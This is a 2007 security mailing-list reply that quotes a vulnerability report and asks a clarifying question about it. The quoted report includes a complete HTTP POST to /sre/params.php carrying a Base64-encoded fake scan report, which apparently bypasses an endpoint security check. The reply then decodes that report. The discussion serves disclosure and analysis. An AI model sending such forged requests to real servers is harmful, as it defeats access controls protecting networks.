Hi, On Mon, 22 Jan 2007 07:37:29 +0200 "Roni Bachar" <roni@xxxxxxxxxxx> wrote: > The vulnerability can be exploited by doing the following stages: > > Sending a post request as followed: > > POST https://serverip/sre/params.php HTTP/1.1 > Content-Type: application/x-www-form-urlencoded > User-Agent: ICS_Secure > Host: serverip > Content-Length: 251 > Cache-Control: no-cache > Cookie: ICS_Test_Cookie=1 > > Report=PD94bWwgdmVyc2lvbj0iMS4wIj8+Cgo8U3JlU2NhblJlcG9ydCBWZXJzaW9uPSIzLjcuM > TE2LjAiPgoJPFVzZXJJbmZvIFdpbkRvbWFpbj0iIiBXaW5Vc2VyPSJyb25pIiBXaW5Vc2VyQ2F0Y > WxvZz0iQzpcRG9jdW1lbnRzIGFuZCBTZXR0aW5nc1xyb25pLkxFTk9WTy00RkZFRjRFMyIvPgo8L > 1NyZVNjYW5SZXBvcnQ+Cg== I assume you meant saying that the Base64 encoded Data in the Report variable must be adjusted to reflect the actual hostname etc., or is params.php accepting _any_ report that looks reasonably valid? For reference, the decoded data in this example is: <?xml version="1.0"?> <SreScanReport Version="3.7.116.0"> <UserInfo WinDomain="" WinUser="roni" WinUserCatalog="C:\Documents and Settings\roni.LENOVO-4FFEF4E3"/> </SreScanReport> cheers FX -- SABRE Labs GmbH | Felix 'FX' Lindner <fx@xxxxxxxxxxxxxx> http://www.sabre-labs.com | GSM: +49 171 7402062 Wrangelstrasse 4 | PGP: A740 DE51 9891 19DF 0D05 10997 Berlin, Germany | 13B3 1759 C388 C92D 6BBB
